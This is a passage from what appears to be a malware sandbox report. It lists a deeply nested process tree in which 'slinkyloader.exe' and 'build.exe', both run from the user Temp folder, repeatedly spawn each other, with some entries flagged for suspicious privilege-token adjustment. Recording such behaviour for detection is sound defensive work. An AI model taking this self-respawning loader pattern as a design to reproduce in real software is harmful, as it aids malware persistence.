        PID:13668
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:13704
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        
        PID:14084
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:14112
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        
        PID:13568
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:13316
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        
        PID:13780
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:10040
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        
        PID:14096
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:13704
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:13544
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:13024
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        
        PID:10656
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        36⤵
        
        PID:11496
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        
        PID:7252
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:10168
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        
        PID:5172
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:11812
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        
        PID:8424
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        
        PID:9160
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        
        PID:11988
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:12348
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        
        PID:9268
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:7924
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:10012
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        
        PID:10140
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        
        PID:13388
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:13428
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        
        PID:13800
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        
        PID:13820
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        
        PID:14216
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        47⤵
        
        PID:14256
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        
        PID:12476
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        
        PID:9964
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        
        PID:12500
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        
        PID:9940
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:10624
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        36⤵
        
        PID:11640
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:13208
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        
        PID:7716
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        
        PID:6568
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        41⤵
        
        PID:488
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        41⤵
        
        PID:11268
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        42⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        42⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        43⤵
        
        PID:10796
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        43⤵
        
        PID:8324
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        44⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        44⤵
        
        PID:10348
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        45⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        45⤵
        
        PID:6412
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        46⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        46⤵
        
        PID:12652
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        47⤵
        
        PID:9040
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        47⤵
        
        PID:9580
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        48⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        48⤵
        
        PID:10156
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        49⤵
        
        PID:9580
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        49⤵
        
        PID:12652
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        50⤵
        
        PID:13532
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        50⤵
        
        PID:13560
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        51⤵
        
        PID:13944
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        51⤵
        
        PID:13980
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        52⤵
        
        PID:8660
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        52⤵
        
        PID:412
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        
        PID:12976
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        
        PID:13308
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        
        PID:8488
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        
        PID:12488
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        
        PID:9928
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        
        PID:12584
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        
        PID:8708
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        
        PID:12820
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        
        PID:13088
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        
        PID:12864
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        
        PID:8376
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:13304
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        
        PID:12564
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        36⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        37⤵
        
        PID:12868
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        37⤵
        
        PID:10904
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        38⤵
        
        PID:10428
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        38⤵
        
        PID:10504
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        39⤵
        
        PID:13272
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        39⤵
        
        PID:13204
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        40⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        40⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        
        PID:11976
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        22⤵
        
        PID:10920
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        23⤵
        
        PID:8236
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        23⤵
        
        PID:10864
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        24⤵
        
        PID:6600
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        24⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        25⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        
        PID:11212
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        26⤵
        
        PID:11412
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        26⤵
        
        PID:11448
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        27⤵
        
        PID:11752
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        27⤵
        
        PID:11812
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        28⤵
        
        PID:12056
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        
        PID:12092
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        
        PID:9512
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        
        PID:11744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:11448
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        
        PID:11920
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        
        PID:12272
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        
        PID:6208
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        
        PID:8788
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        
        PID:11196
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        
        PID:3044
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:12300
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        19⤵
        
        PID:10028
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        
        PID:8640
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        13⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        14⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        14⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7288
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        15⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        16⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7720
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        16⤵
        
        PID:7764
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        17⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        17⤵
        
        PID:8176
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        18⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        18⤵
        
        PID:7772
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        19⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        19⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        20⤵
        
        PID:8224
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        20⤵
        
        PID:8280
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        21⤵
        
        PID:8764
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        21⤵
        
        PID:8800
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        22⤵
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        22⤵
        
        PID:8592
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        23⤵
        
        PID:9116
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        23⤵
        
        PID:9072
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        24⤵
        
        PID:8352
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        24⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        25⤵
        
        PID:9444
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        25⤵
        
        PID:9484
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        26⤵
        
        PID:9904
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        26⤵
        
        PID:9956
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        27⤵
        
        PID:10196
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        27⤵
        
        PID:10232
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        28⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        28⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        29⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        29⤵
        
        PID:9540
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        30⤵
        
        PID:9916
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        30⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        31⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        31⤵
        
        PID:6048
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        32⤵
        
        PID:8304
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        32⤵
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        33⤵
        
        PID:10488
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        33⤵
        
        PID:10524
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        34⤵
        
        PID:10780
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        34⤵
        
        PID:10796
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        35⤵
        
        PID:11068
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        35⤵
        
        PID:11096
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        36⤵
        
        PID:10364
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
